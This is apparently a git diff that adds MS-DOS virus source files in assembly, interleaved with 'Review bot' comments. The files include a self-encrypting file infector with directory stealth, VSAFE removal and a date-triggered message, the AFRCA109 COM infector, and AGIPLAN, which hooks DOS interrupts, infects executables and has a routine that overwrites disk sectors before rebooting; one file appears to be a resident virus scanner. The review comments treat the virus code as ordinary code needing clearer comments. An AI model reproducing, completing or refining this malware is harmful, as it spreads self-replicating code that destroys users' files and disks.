fin + 50 + (offset crypt - offset start) ;virus +mov dx,1 +enc2: ; + +not byte ptr [di] +dec byte ptr [di] +xor word ptr [di],02ff5h +xor word ptr [di],0eaa0h +add word ptr [di],04fb9h +add word ptr [di],06236h +dec byte ptr [di] +dec word ptr [di] +add word ptr [di],096b1h +sub byte ptr [di],0c7h +dec word ptr [di] +sub word ptr [di],0463h +add word ptr [di],09553h +dec word ptr [di] +not byte ptr [di] +not byte ptr [di] +inc di +inc di ;the virus code +loop enc2 ; +;-------------------------------------------- +mov ah,40h ; +mov cx,offset fin - offset start ;copy the virus +mov dx,offset fin + 50 ;to end of file +int 21h ; +;---------------------------------------------------------- +cerrar: ; + ;restore the +mov ax,5701h ;date and time +mov cx,word ptr cs:[hora] ;file +mov dx,word ptr cs:[dia] ; +or cx,word ptr cs:[fecha] ;and mark the seconds +int 21h ; +;---------------------------------------------------------- +mov ah,3eh ; +int 21h ;close the file +;---------------------------------------------------------- +pop ds ; +pop es ;restore the +pop bp ;registers +pop di ; +pop si ; +popa ; +popf ; +;---------------------------------------------------------- +pusha ; + ; +mov ax,4301h ;restores the atributes +mov cx,word ptr cs:[attrib] ;of the file +int 21h ; + ; +popa ; +;---------------------------------------------------------- +pushf ; +pusha ; 8-( = f-prot +push si ; +push di ; 8-( = tbav +push bp ; +push es ; 8-) = I'm +push ds ; +;---------------------------------------------------------- +mov ax,2524H ; +lea bx,error ;restore the +mov ds,bx ;errors handler +lea bx,error+2 ; +int 21h ; +;---------------------------------------------------------- +pop ds ; +pop es ; +pop bp ;restore the +pop di ;resgisters +pop si ; +popa ; +popf ; +;---------------------------------------------------------- +JMP A3 ;jmp to orig. 
INT 21 + ; +;********************************************************** +; SUBRUTINES AREA +;********************************************************** + ; +movedor: ; + ; +xor cx,cx ;use to move file pointer +xor dx,dx ; +int 21h ; +ret ; +;---------------------------------------------------------- +all: ; + ; +XOR AL,AL ;use to set +iret ;error flag + +;*********************************************************** +; DATA AREA +;*********************************************************** +largo dw ? +jump db 0e9h +real db 0cdh,20h,0 +hora dw ? +dia dw ? +attrib dw ? +int21 dd ? +error dd ? + +;--------------------------------- +action: ;Call label +MOV AH,2AH ; +INT 21H ;get date +CMP Dl,byte ptr cs:[action_dia+bp] ;is equal to my day? +JE cont ;nop! fuck ret +cmp byte ptr cs:[action_dia+bp],32 ; +jne no_day ; +cont: ; +cmp dh,byte ptr cs:[action_mes+bp] ;is equal to my month? +je set ; +cmp byte ptr cs:[action_mes+bp],13 ; +jne NO_DAY ;nop! fuck ret +set: ; +mov AH,9 ;yeah!! +MOV DX,OFFSET PAO ;print my text! +INT 21H ;now! +INT 20H ;an finsh te program +NO_DAY: ;label to incorrect date +ret ;return from call +;--------------------------------- + + +PAO: +DB 10,13,'To you from Intestinal Fortitude','$' + +;--------------------------------- +ANTI_V: ; +MOV AX,0FA01H ;REMOVE VSAFE FROM MEMORY +MOV DX,5945H ; +INT 21H ; +ret ; +;--------------------------------- + +;***************************************************** +dir_s: + pushf + push cs + call a3 ;Get file Stats + test al,al ;Good FCB? + jnz no_good ;nope + push ax + push bx + push es + mov ah,51h ;Is this Undocmented? huh... 
+ int 21h + mov es,bx + cmp bx,es:[16h] + jnz not_infected + mov bx,dx + mov al,[bx] + push ax + mov ah,2fh ;Get file DTA + int 21h + pop ax + inc al + jnz fcb_okay + add bx,7h +fcb_okay: mov ax,es:[bx+17h] + and ax,1fh ;UnMask Seconds Field + xor al,byte ptr cs:fechad + jnz not_infected + and byte ptr es:[bx+17h],0e0h + sub es:[bx+1dh],OFFSET FIN - OFFSET START ;Yes minus virus size + sbb es:[bx+1fh],ax +not_infected:pop es + pop bx + pop ax +no_good: iret +;******************************************************************** +; THIS DIR STEALTH METOD IS EXTRAC FROM NUKEK INFO JOURNAL 4 & N-POX +;********************************************************************* + +action_dia Db 019H ;day for the action +action_mes Db 0bH ;month for the action +FECHA DW 01eH ;Secon for mark +FECHAd Db 01eH ;Secon for mark dir st +fin: +code ends +end start diff --git a/MSDOS/Virus.MSDOS.Unknown.afrca109.asm b/MSDOS/Virus.MSDOS.Unknown.afrca109.asm new file mode 100644 index 00000000..beb3fb20 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.afrca109.asm 
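Review bot: The comments on the infection-marker and MZ checks in `REPRODUCCION` state the opposite of what the branches do. `jne seguir ;yes! the file is infected!` is taken when the masked seconds field differs from `fecha`, i.e. when the file is not yet marked, and the following `jmp cerrar` is the already-marked path; likewise `jne er1 ;yes! is a EXE... fuckkk!` jumps when the first word is not 'MZ', and the fall-through `jmp cerrar` is the EXE case. I'd rewrite them as `jne seguir ;seconds field differs: not marked yet` and `jne er1 ;not 'MZ': continue (EXE files are skipped)` so the control flow reads the way it executes.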
@@ -0,0 +1,99 @@
+
+PAGE 59,132
+
+;
+;
+; AFRCA109
+;
+; Created: 16-Sep-92
+; Passes: 5 Analysis Options on: AW
+;
+;
+
+data_2e equ 4F43h
+data_3e equ 0FE00h
+
+seg_a segment byte public
+ assume cs:seg_a, ds:seg_a
+
+
+ org 100h
+
+afrca109 proc far
+
+start:
+ mov si,100h
+ push si
+ mov ax,cs
+ add ah,10h
+ mov es,ax
+ xor di,di ; Zero register
+ mov cx,6Dh
+ rep movsb ; Rep when cx >0 Mov [si] to es:[di]
+ mov dx,data_3e
+ mov ah,1Ah
+ int 21h ; DOS Services ah=function 1Ah
+ ; set DTA(disk xfer area) ds:dx
+ mov dx,167h
+ mov ah,4Eh ; 'N'
+ jmp short loc_2
+loc_1:
+ mov ah,3Eh ; '>'
+ int 21h ; DOS Services ah=function 3Eh
+ ; close file, bx=file handle
+ mov ah,4Fh ; 'O'
+loc_2:
+ push cs
+ pop ds
+ int 21h ; DOS Services ah=function 4Fh
+ ; find next filename match
+ mov cx,0FE1Eh
+ jc loc_3 ; Jump if carry Set
+ mov dx,cx
+ mov ax,3D02h
+ int 21h ; DOS Services ah=function 3Dh
+ ; open file, al=mode,name@ds:dx
+ xchg ax,bx
+ push es
+ pop ds
+ mov dx,di
+ mov ah,3Fh ; '?'
+ int 21h ; DOS Services ah=function 3Fh
+ ; read file, bx=file handle
+ ; cx=bytes to ds:dx buffer
+ add ax,6Dh
+ cmp byte ptr [di],0BEh
+ je loc_1 ; Jump if equal
+ push ax
+ xor cx,cx ; Zero register
+ mov ax,4200h
+ cwd ; Word to double word
+ int 21h ; DOS Services ah=function 42h
+ ; move file ptr, bx=file handle
+ ; al=method, cx,dx=offset
+ pop cx
+ mov ah,40h ; '@'
+ int 21h ; DOS Services ah=function 40h
+ ; write file bx=file handle
+ ; cx=bytes from ds:dx buffer
+ jmp short loc_1
+loc_3:
+ push cs
+ pop es
+ mov bl,0FCh
+ mov word ptr [bx],0AAACh
+ mov word ptr [bx+2],0FCE2h
+ pop di
+ push bx
+ retn
+ sub ch,ds:data_2e
+ dec bp
+ add bl,al
+
+afrca109 endp
+
+seg_a ends
+
+
+
+ end start
diff --git a/MSDOS/Virus.MSDOS.Unknown.ag.asm b/MSDOS/Virus.MSDOS.Unknown.ag.asm
new file mode 100644
index 00000000..df12ca6d
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.ag.asm
@@ -0,0 +1,367 @@
+.286c
+.model small
+.code
+ org 100h
+start:
+
+jmp install
+
+old_si dw 0
+old_bx dw 0
+old_cx dw 0
+old_dx dw 0
+es_main dw 0
+num_ff dw 0
+last_pag dw 0
+viroff dw 0
+count db 0
+scan_seg dw 0
+mes db 'Found !','$'
+filnm db 15 dup(0)
+buffer db 'NCMAIN.EXE',0h,0h,0h,0h,0h
+ db 'QA.COM',
+ db 64 dup (0)
+
+include datagame.inc
+
+
+int_21h_entry:
+
+ pushf ; Push flags
+ sti ; Enable interrupts
+ cmp ah,4Bh ;
+ jne loc_24 ; Jump if equal
+ cmp al,0
+ je loc_25
+
+loc_24:
+ popf ; Pop flags
+ db 0EAh
+old_21h_off dw ?
+old_21h_seg dw ?
+
+
+loc_25:
+ mov cs:old_bx,bx
+ push ax
+ push cx
+ push di
+ push es
+ push ds
+ push si
+ push dx
+
+ mov si,dx
+loc_205:
+ inc si
+ cmp byte ptr ds:[si],0
+ jne loc_205
+ mov bh,0
+loc_206:
+ inc bh
+ dec si
+ cmp byte ptr ds:[si],'\'
+ jne loc_206
+ inc si
+ dec bh
+ push cs
+ pop es
+ xor cx,cx
+ mov bl,-1
+loc_94:
+ inc bl
+ lea di,cs:buffer
+ mov ax,15
+ mul bl
+ add di,ax
+ push si
+ mov cl,bh
+ rep cmpsb
+ pop si
+ je loc_57
+ cmp bl,4
+ jne loc_94
+ jmp short loc_95
+
+loc_57:
+ mov byte ptr cs:count,0
+ jmp loc_fin
+
+loc_95:
+ mov cl,bh
+ lea di,cs:filnm
+ repne movsb
+ sub si,3
+ cmp word ptr ds:[si],'XE'
+ jne loc_47
+ lea ax,cs:only_exe
+ mov byte ptr bl,cs:only_exe_count
+ jmp short loc_files
+
+loc_47:
+ cmp word ptr ds:[si],'OC'
+ je loc_79
+ lea ax,cs:ov_pi
+ mov byte ptr bl,cs:ov_pi_count
+ jmp short loc_files
+
+loc_79:
+ lea ax,cs:com_exe
+ mov byte ptr bl,cs:com_exe_count
+
+loc_files:
+
+ mov cs:viroff,ax
+ mov byte ptr cs:count,bl
+
+ mov ah,3dh
+ xor al,al
+ int 21h ; file is open for reading
+ jc loc_fin
+
+ mov bx,ax
+ mov ah,42h
+ xor cx,cx
+ mov dx,cx
+ mov al,2
+ int 21h ; seek to the end
+
+ mov cs:num_ff,dx ; save number of 64k
+ mov cs:last_pag,ax ; save length of last page
+
+ mov ah,3eh
+ int 21h ; close the file
+
+loc_fin:
+ pop dx
+ pop si
+ pop ds
+ pop es
+ pop di
+ pop cx
+ pop ax
+loc_en:
+ mov bx,cs:old_bx
+ jmp loc_24
+
+message:
+ mov dx,si
+ mov ah,09h
+ int 21h
+ lea dx,mes
+ mov ah,09h
+ int 21h
+ ret
+
+int_4b_scan:
+
+ mov old_bx,bx
+ mov old_dx,dx
+ push cs
+ pop ds
+ add dx,10h ; dx = Start seg
+
+ call scanvir
+ jc loc_vir
+
+ mov ax,old_bx
+ mov dx,old_dx
+ mov ds,dx
+ mov es,dx
+ retf
+
+loc_vir:
+; call message
+ pop dx
+ pop ds
+ mov dx,old_dx
+ push dx
+ xor dx,dx
+ push dx
+ retf
+
+
+scanvir:
+ ; dx = segment for scan (offset = 0)
+ ; cs:viroff = offset of virtable
+ ; ds = segment of virtable
+ ; cs:count = number of viruses
+ ; cs:num_ff = number of 64k
+ ; cs:last_pag = number of bytes in last page
+ ; return bit c if virus is founded
+ ; ds:si points to the viruses name
+ ; bp,es,di,bx,ax,dx
+
+ mov cs:es_main,dx ; es_main = Start_seg
+
+ mov bp,cs:viroff ; bp - pointer to virus table
+ mov bh,0
+
+loc_5:
+ cmp byte ptr cs:count,bh
+ jne loc_61
+ ret
+loc_61:
+ inc bh
+ mov di,cs:es_main ;
+ mov es,di ;
+ xor di,di ;
+ mov dx,cs:num_ff ;
+ mov si,cs:[bp] ; si points to this viruses pattern
+ lodsb
+ mov bl,al ; bl - counter of characters in virus pattern
+ sub bl,1
+ lodsb ; al - first char of pattern
+ jmp loc_12 ; go to search
+
+loc_9:
+ cmp dx,-1 ; virus is ended ?
+ jne loc_15 ; no
+ add bp,2 ; bp points to the next virus
+ jmp loc_5
+
+loc_15:
+
+ xor di,di ; di points to the beginning of the next segment
+ mov cx,es ;
+ add cx,1000h ;
+ mov es,cx ; es points to the next segment
+
+loc_12:
+ cmp dx,0 ; we'll work with last page ?
+ je loc_2 ; yes
+ mov cx,0ffffh ; cx = maximum counter
+ jmp loc_10
+loc_2:
+ mov cx,cs:last_pag ;
+
+loc_10:
+
+ repne scasb ; search for first char
+ je loc_13 ; found
+ dec dx ; decrement of the counter of 64k
+ jmp loc_9 ; go to the preparing for the search in next segment
+
+loc_13:
+ mov cs:old_cx,cx ;
+ mov cs:old_si,si
+ push di
+ push es
+ cmp di,0fff0h
+ jbe loc_7
+ mov cx,es
+ inc cx
+ mov es,cx
+ sub di,10h
+
+loc_7:
+ xor cx,cx
+ mov cl,bl
+ repz cmpsb
+ jne loc_11
+ pop es
+ pop di
+ jmp loc_89 ; found !
+
+loc_11:
+ mov si,cs:old_si
+ pop es
+ pop di
+ mov cx,cs:old_cx
+ jmp loc_10
+
+loc_er:
+
+
+loc_89:
+ stc
+ ret
+
+
+pattern:
+ db 08eh
+ db 0c2h
+ db 08eh
+ db 0dah
+ db 08bh
+ db 0c3h
+ db 0cbh
+
+
+install:
+ int 5
+
+ cli ; set new stack
+ mov ax,cs
+ mov ss,ax
+ mov bx,offset n
+ add bx,50h
+ mov sp,bx
+ sti
+
+ xor ax,ax
+ push ax
+ pop ds ; ds=0
+ cli
+
+ mov di,ds:[21h*4]
+ mov ax,ds:[21h*4+2]
+ mov cs:old_21h_off,di
+ mov cs:old_21h_seg,ax
+
+ mov di,ds:[31h*4]
+ mov ax,ds:[31h*4+2]
+ push ax
+ pop es
+
+
+ mov ds:[21h*4],offset int_21h_entry
+ mov ds:[21h*4+2],cs
+
+ sti
+
+ ; find 'MZ'
+ mov cx,-1
+ cld
+ mov byte ptr al,4dh
+loc_lo:
+ repne scasb
+ jne loc_err
+ cmp byte ptr es:[di],5ah
+ jne loc_lo
+
+loc_loop:
+ ; 'MZ' found
+
+ push cs
+ pop ds
+ lea si,cs:pattern
+ inc si
+
+
+ mov byte ptr al,cs:[si-1]
+ inc si
+loc_loop1:
+ dec si
+ repne scasb
+ jne loc_err
+ push cx
+ mov cx,6
+ rep cmpsb
+ pop cx
+ jnz loc_loop1
+
+suc_end:
+
+ mov byte ptr es:[di-5],0eah
+ mov es:[di-4],offset int_4b_scan
+ mov es:[di-2],cs
+
+loc_err:
+
+ mov dx,offset install
+ int 27h
+
+n:
+ dw 50 dup (0)
+ end start
\ No newline at end of file
diff --git a/MSDOS/Virus.MSDOS.Unknown.agiplan.asm b/MSDOS/Virus.MSDOS.Unknown.agiplan.asm
new file mode 100644
index 00000000..d1f62b0c
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.agiplan.asm
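Review bot: The comment on `jne loc_24 ; Jump if equal` in `int_21h_entry` contradicts the instruction: the branch is taken when AH is not 4Bh, and `loc_24` pops the flags and far-jumps to the saved handler through the `db 0EAh` / `old_21h_off` / `old_21h_seg` bytes. I'd write it as `jne loc_24 ; not EXEC (AH=4Bh): hand straight to the original INT 21h`. The `scanvir` header lists `bp,es,di,bx,ax,dx` with no verb, presumably the registers it clobbers, and `loc_er:` is an empty label that nothing in the file references; both deserve either a word of explanation or removal.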
@@ -0,0 +1,1003 @@
+
+PAGE 59,132
+
+;
+;
+; AGIPLAN
+;
+; Created: 1-Sep-90
+; Version:
+; Passes: 5 Analysis Options on: none
+;
+;
+;
+
+movseg macro reg16, unused, Imm16 ; Fixup for Assembler
+ ifidn ,
+ db 0BBh
+ endif
+ ifidn ,
+ db 0B9h
+ endif
+ ifidn ,
+ db 0BAh
+ endif
+ ifidn ,
+ db 0BEh
+ endif
+ ifidn ,
+ db 0BFh
+ endif
+ ifidn ,
+ db 0BDh
+ endif
+ ifidn ,
+ db 0BCh
+ endif
+ ifidn ,
+ db 0BBH
+ endif
+ ifidn ,
+ db 0B9H
+ endif
+ ifidn ,
+ db 0BAH
+ endif
+ ifidn ,
+ db 0BEH
+ endif
+ ifidn ,
+ db 0BFH
+ endif
+ ifidn ,
+ db 0BDH
+ endif
+ ifidn ,
+ db 0BCH
+ endif
+ dw seg Imm16
+endm
+data_1e equ 46Dh ; (0000:046D=0B35h)
+data_2e equ 600h ; (0000:0600=54h)
+data_3e equ 0Eh ; (0A10:000E=1)
+data_4e equ 1 ; (936D:0001=0FFFFh)
+data_5e equ 0 ; (936E:0000=0)
+data_6e equ 2 ; (936E:0002=0)
+data_7e equ 12h ; (936E:0012=0)
+data_8e equ 14h ; (936E:0014=936Eh)
+data_9e equ 0F0h ; (936E:00F0=0)
+data_10e equ 0F6h ; (936E:00F6=0)
+data_11e equ 0FAh ; (936E:00FA=0)
+data_12e equ 0FEh ; (936E:00FE=0)
+data_45e equ 2Ch ; (93CE:002C=0FFFFh)
+data_46e equ 5B0h ; (93CE:05B0=41h)
+data_47e equ 600h ; (93CE:0600=41h)
+data_48e equ 1 ; (FFFE:0001=0)
+
+seg_a segment byte public
+ assume cs:seg_a, ds:seg_a
+
+
+ org 100h
+
+agiplan proc far
+
+start:
+ jmp loc_43 ; (04CF)
+data_14 db 'P1.8&', 5, 'u', 7, 'X.', 0FFh
+ db '.', 5, '', 0FFh, 0
+ db 75h,0F4h, 58h
+data_15 db 9Dh
+ db 0B8h, 03h, 00h,0CFh, 90h, 90h
+ db 90h
+data_16 db 0
+ db 90h, 00h,0FFh,0FFh,0FFh,0FFh
+ db 0FFh
+
+agiplan endp
+
+;
+;
+; External Entry Point
+;
+;
+
+int_21h_entry proc far
+ pushf ; Push flags
+ cmp ah,4Eh ; 'N'
+ jne loc_4 ; Jump if not equal
+ jmp short loc_8 ; (0154)
+loc_4:
+ cmp ah,4Bh ; 'K'
+ jne loc_5 ; Jump if not equal
+ jmp short loc_8 ; (0154)
+loc_5:
+ cmp ah,0Eh
+ jne loc_6 ; Jump if not equal
+ jmp short loc_8 ; (0154)
+loc_6:
+ cmp ah,40h ; '@'
+ jne loc_7 ; Jump if not equal
+ jmp short loc_8 ; (0154)
+loc_7:
+ popf ; Pop flags
+ jmp dword ptr cs:data_35 ;
(936E:05E4=138Dh) + db 90h +loc_8: + cli ; Disable interrupts + push es + push ds + push di + push si + push bp + push dx + push cx + push bx + push ax + mov cs:data_31,ss ; (936E:05DB=0A10h) + mov cs:data_32,sp ; (936E:05DD=743h) + mov al,0FFh + mov cs:data_30,al ; (936E:05DA=0FFh) + mov ax,3524h + int 7Eh ; ??INT Non-standard interrupt. + cmp word ptr cs:data_37,bx ; (936E:05E8=4EBh) + jne loc_9 ; Jump if not equal + mov ax,2524h + mov dx,108h + push cs + pop ds + int 7Eh ; ??INT Non-standard interrupt. +loc_9: + sti ; Enable interrupts + jmp short loc_11 ; (01AA) +loc_10: + cli ; Disable interrupts + xor ax,ax ; Zero register + mov cs:data_30,ah ; (936E:05DA=0FFh) + mov ss,cs:data_31 ; (936E:05DB=0A10h) + mov sp,cs:data_32 ; (936E:05DD=743h) + pop ax + pop bx + pop cx + pop dx + pop bp + pop si + pop di + pop ds + pop es + popf ; Pop flags + sti ; Enable interrupts + jmp dword ptr cs:data_35 ; (936E:05E4=138Dh) + db 90h +loc_11: + pop ax + pop bx + push bx + push ax + cmp ah,4Bh ; 'K' + je loc_16 ; Jump if equal + cmp ah,40h ; '@' + jne loc_12 ; Jump if not equal + jmp short loc_15 ; (01CC) +loc_12: + cmp ah,0Eh + jne loc_13 ; Jump if not equal + jmp short loc_10 ; (0187) +loc_13: + cmp ah,4Eh ; 'N' + jne loc_10 ; Jump if not equal + jmp short loc_10 ; (0187) + db 90h +loc_14: + jmp loc_23 ; (0283) +loc_15: + mov ax,0Fh + cmp cs:data_29,al ; (936E:05D9=0) + jb loc_10 ; Jump if below + ja loc_14 ; Jump if above + cmp bx,4 + jbe loc_10 ; Jump if below or = + mov bx,1 + push cs + pop ds + add ds:data_11e,bx ; (936E:00FA=0) + mov ah,2Ch ; ',' + int 7Eh ; ??INT Non-standard interrupt. + cmp dh,ds:data_11e ; (936E:00FA=0) + ja loc_10 ; Jump if above + mov bx,data_3e ; (0A10:000E=1) + add bx,data_32 ; (936E:05DD=743h) + mov ss:[bx],bx + jmp short loc_10 ; (0187) + db 01h, 90h, 90h, 90h +loc_16: + mov cs:data_33,dx ; (936E:05DF=3D7Bh) + mov cs:data_34,ds ; (936E:05E1=7B6Eh) + push cs + pop ds + mov ah,2Ch ; ',' + int 7Eh ; ??INT Non-standard interrupt. 
+ cmp dh,ds:data_12e ; (936E:00FE=0) + jb loc_17 ; Jump if below + jmp loc_10 ; (0187) +loc_17: + mov dx,data_33 ; (936E:05DF=3D7Bh) + mov ds,data_34 ; (936E:05E1=7B6Eh) + push ax + mov al,2Eh ; '.' + cld ; Clear direction + push ds + push dx + cli ; Disable interrupts + mov di,dx + push ds + pop es + mov cx,20h + repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al + jnz loc_20 ; Jump if not zero + push cs + pop ds + mov si,offset data_21 ; (936E:05C8=43h) + mov cx,3 + repe cmpsb ; Rep zf=1+cx >0 Cmp [si] to es:[di] + jnz loc_22 ; Jump if not zero + sub di,0Bh + mov si,offset data_20 ; (936E:05C0=43h) + mov cx,0Bh + repe cmpsb ; Rep zf=1+cx >0 Cmp [si] to es:[di] + mov dh,0FFh + mov cs:data_16,dh ; (936E:0128=0) + jz loc_18 ; Jump if zero + xor dx,dx ; Zero register + mov cs:data_16,dh ; (936E:0128=0) +loc_18: + add sp,6 + push cs + pop ds +loc_19: + call sub_2 ; (02C0) +loc_20: + jmp loc_10 ; (0187) + db 90h, 90h +loc_21: +;* jmp loc_34 ;*(03E0) + db 0E9h, 76h, 01h +loc_22: + add sp,6 + push cs + pop ds + mov dx,5C0h + mov data_33,dx ; (936E:05DF=3D7Bh) + mov data_34,ds ; (936E:05E1=7B6Eh) + mov dh,0FFh + mov data_16,dh ; (936E:0128=0) + jmp short loc_19 ; (025F) + db 90h +loc_23: + mov cx,501h + mov dx,100h + call sub_1 ; (02A0) + mov dx,101h + call sub_1 ; (02A0) + mov dx,380h + call sub_1 ; (02A0) + mov dx,381h + call sub_1 ; (02A0) + int 19h ; Bootstrap loader +int_21h_entry endp + + +; +; SUBROUTINE +; + +sub_1 proc near + push dx +loc_24: + mov ax,309h + int 13h ; Disk dl=drive a ah=func 03h + ; write sectors from mem es:bx + sub dh,1 + cmp dh,0 + jge loc_24 ; Jump if > or = + pop dx + push dx + sub cx,100h + cmp cx,0 + jge loc_24 ; Jump if > or = + retn +sub_1 endp + + db 90h, 90h, 90h +loc_25: + jmp loc_31 ; (03A3) + +; +; SUBROUTINE +; + +sub_2 proc near + mov ah,48h ; 'H' + mov bx,0FFFh + int 7Eh ; ??INT Non-standard interrupt. 
+ jc loc_21 ; Jump if carry Set + nop + mov ds:data_11e,ax ; (936E:00FA=0) + mov dx,data_33 ; (936E:05DF=3D7Bh) + mov ds,data_34 ; (936E:05E1=7B6Eh) + mov ah,3Ah ; ':' + mov bx,dx + add bx,1 + cmp ah,[bx] + mov ah,0 + jnz loc_27 ; Jump if not zero + mov bx,dx + mov al,50h ; 'P' + mov ah,[bx] + cmp ah,50h ; 'P' + ja loc_26 ; Jump if above + sub ah,40h ; '@' + jmp short loc_27 ; (02F5) +loc_26: + sub ah,60h ; '`' +loc_27: + mov dl,ah + mov ah,36h ; '6' + int 7Eh ; ??INT Non-standard interrupt. + cmp bx,9 + jb loc_25 ; Jump if below + mov dx,cs:data_33 ; (936E:05DF=3D7Bh) + mov ax,4300h + int 7Eh ; ??INT Non-standard interrupt. + mov cs:data_39,cx ; (936E:05EC=20h) + mov ax,4301h + xor cx,cx ; Zero register + int 7Eh ; ??INT Non-standard interrupt. + nop + mov ax,3D42h + int 7Eh ; ??INT Non-standard interrupt. + jc loc_25 ; Jump if carry Set + mov bx,ax + mov ah,3Fh ; '?' + mov cx,0FFFFh + mov dx,600h + mov ds,cs:data_11e ; (936E:00FA=0) + int 7Eh ; ??INT Non-standard interrupt. + jc loc_30 ; Jump if carry Set + add ax,600h + mov cs:data_10e,ax ; (936E:00F6=0) + cmp ax,1000h + jb loc_30 ; Jump if below + cmp ax,0D000h + ja loc_30 ; Jump if above + mov si,offset ds:[100h] ; (936E:0100=0E9h) + push cs + pop ds + xor di,di ; Zero register + mov es,cs:data_11e ; (936E:00FA=0) + mov cx,2FFh + cld ; Clear direction + rep movsw ; Rep when cx >0 Mov [si] to es:[di] + push es + pop ds + xor di,di ; Zero register + mov si,data_2e ; (0000:0600=54h) + mov cx,10h + repe cmpsb ; Rep zf=1+cx >0 Cmp [si] to es:[di] + jz loc_30 ; Jump if zero + mov ah,cs:data_16 ; (936E:0128=0) + cmp ah,0FFh + jne loc_28 ; Jump if not equal + call sub_3 ; (03C8) + jmp short loc_29 ; (0377) +loc_28: + mov ax,9090h + mov ds:data_1e,ax ; (0000:046D=0B35h) +loc_29: + nop + mov ax,4200h + xor cx,cx ; Zero register + xor dx,dx ; Zero register + int 7Eh ; ??INT Non-standard interrupt. + mov ax,5700h + int 7Eh ; ??INT Non-standard interrupt. 
+ push cx + push dx + mov ah,40h ; '@' + mov cx,cs:data_10e ; (936E:00F6=0) + xor dx,dx ; Zero register + mov ds,cs:data_11e ; (936E:00FA=0) + int 7Eh ; ??INT Non-standard interrupt. + pop dx + pop cx + mov ax,5701h + int 7Eh ; ??INT Non-standard interrupt. +loc_30: + mov ah,3Eh ; '>' + int 7Eh ; ??INT Non-standard interrupt. +loc_31: + mov cx,cs:data_39 ; (936E:05EC=20h) + mov dx,cs:data_33 ; (936E:05DF=3D7Bh) + mov ds,cs:data_34 ; (936E:05E1=7B6Eh) + mov ax,4301h +loc_32: + int 7Eh ; ??INT Non-standard interrupt. + push cs + pop ds + mov es,cs:data_11e ; (936E:00FA=0) + mov ah,49h ; 'I' + int 7Eh ; ??INT Non-standard interrupt. + retn +sub_2 endp + + db 90h, 90h, 90h, 90h, 90h + +; +; SUBROUTINE +; + +sub_3 proc near + mov ax,0D08Eh + mov ds:data_1e,ax ; (0000:046D=0B35h) + mov di,data_2e ; (0000:0600=54h) + mov cx,3000h + mov ax,0B8C9h +loc_33: + repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al + cmp ah,es:[di] + jne loc_33 ; Jump if not equal + mov dx,4200h + cmp dx,es:[di+1] + jne loc_33 ; Jump if not equal + mov dh,0BAh + cmp dh,es:[di-5] + jne loc_33 ; Jump if not equal + cmp cx,0 + jne loc_35 ; Jump if not equal + pop dx + jmp short loc_32 ; (03B5) + db 90h +loc_35: + mov dx,es:[di-4] + add dx,600h + mov es:[di-4],dx + retn +sub_3 endp + + db 11 dup (90h) + +; +; SUBROUTINE +; + +sub_4 proc near + mov ax,4A00h + mov bx,5Fh + int 21h ; DOS Services ah=function 4Ah + ; change mem allocation, bx=siz + mov bx,cs + sub bx,1 + mov ds,bx + mov ax,0FFFFh + mov ds:data_4e,ax ; (936D:0001=0FFFFh) + push cs + pop ds + mov ax,4800h + mov bx,0FFFFh + int 21h ; DOS Services ah=function 48h + ; allocate memory, bx=bytes/16 + mov ax,4800h + int 21h ; DOS Services ah=function 48h + ; allocate memory, bx=bytes/16 + retn +sub_4 endp + + db 0CBh + db 26 dup (90h) + +; +; SUBROUTINE +; + +sub_5 proc near + mov cx,10h + mov si,offset data_15 ; (936E:0120=9Dh) + mov di,data_9e ; (936E:00F0=0) + cld ; Clear direction + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + mov ah,2Ah ; 
'*' + int 21h ; DOS Services ah=function 2Ah + ; get date, cx=year, dx=mon/day + cmp cx,data_25 ; (936E:05D1=7BCh) + ja loc_38 ; Jump if above + jc loc_36 ; Jump if carry Set + cmp dx,data_26 ; (936E:05D3=701h) + ja loc_38 ; Jump if above +loc_36: + cmp cx,data_27 ; (936E:05D5=7BCh) + ja loc_39 ; Jump if above + jc loc_37 ; Jump if carry Set + cmp dx,data_28 ; (936E:05D7=501h) + ja loc_39 ; Jump if above +loc_37: + mov ax,0 + jmp short loc_40 ; (0487) +loc_38: + or ax,0F0h +loc_39: + or ax,0Fh +loc_40: + mov data_29,al ; (936E:05D9=0) + push dx + push cx + xor bx,bx ; Zero register + call sub_6 ; (04A5) + pop cx + pop dx + mov bx,data_6e ; (936E:0002=0) + call sub_6 ; (04A5) + mov ah,1 + add data_22,ah ; (936E:05CC=14h) + nop + retn +sub_5 endp + + db 90h, 90h, 90h, 90h + +; +; SUBROUTINE +; + +sub_6 proc near + add dl,data_24[bx] ; (936E:05CE=0) + cmp dl,20h ; ' ' + jbe loc_41 ; Jump if below or = + add dh,1 + sub dl,20h ; ' ' +loc_41: + add dh,data_23[bx] ; (936E:05CD=6) + cmp dh,0Bh + jbe loc_42 ; Jump if below or = + sub dh,0Bh + add cx,1 +loc_42: + add bx,bx + nop + mov data_26[bx],dx ; (936E:05D3=701h) + mov data_25[bx],cx ; (936E:05D1=7BCh) + retn +sub_6 endp + +loc_43: + push ax + mov al,3Fh ; '?' 
+ mov dx,70h + out dx,al ; port 70h, RTC addr/enabl NMI + mov dx,71h + in al,dx ; port 71h, RTC clock/RAM data + cmp al,0F0h + jbe loc_44 ; Jump if below or = + jmp loc_47 ; (057B) +loc_44: + mov ax,357Fh + int 21h ; DOS Services ah=function 35h + ; get intrpt vector al in es:bx + mov ax,ds + mov es,ax + cmp bx,0FFFFh + jne loc_45 ; Jump if not equal + jmp loc_48 ; (0582) +loc_45: + mov dx,0FFFFh + mov ax,257Fh + int 21h ; DOS Services ah=function 25h + ; set intrpt vector al to ds:dx + mov ax,3521h + int 21h ; DOS Services ah=function 35h + ; get intrpt vector al in es:bx + mov word ptr data_35,bx ; (936E:05E4=138Dh) + mov word ptr data_35+2,es ; (936E:05E6=28Ch) + mov ax,es + mov ds,ax + mov dx,bx + mov ax,257Eh + int 21h ; DOS Services ah=function 25h + ; set intrpt vector al to ds:dx + mov ax,cs + mov es,ax + mov ds,ax + mov dx,offset int_21h_entry + mov ax,2521h + int 21h ; DOS Services ah=function 25h + ; set intrpt vector al to ds:dx + mov ax,3524h + int 21h ; DOS Services ah=function 35h + ; get intrpt vector al in es:bx + mov word ptr data_37,bx ; (936E:05E8=4EBh) + mov word ptr data_37+2,es ; (936E:05EA=0A10h) + mov ax,es + mov ds,ax + mov dx,bx + mov ax,25FDh 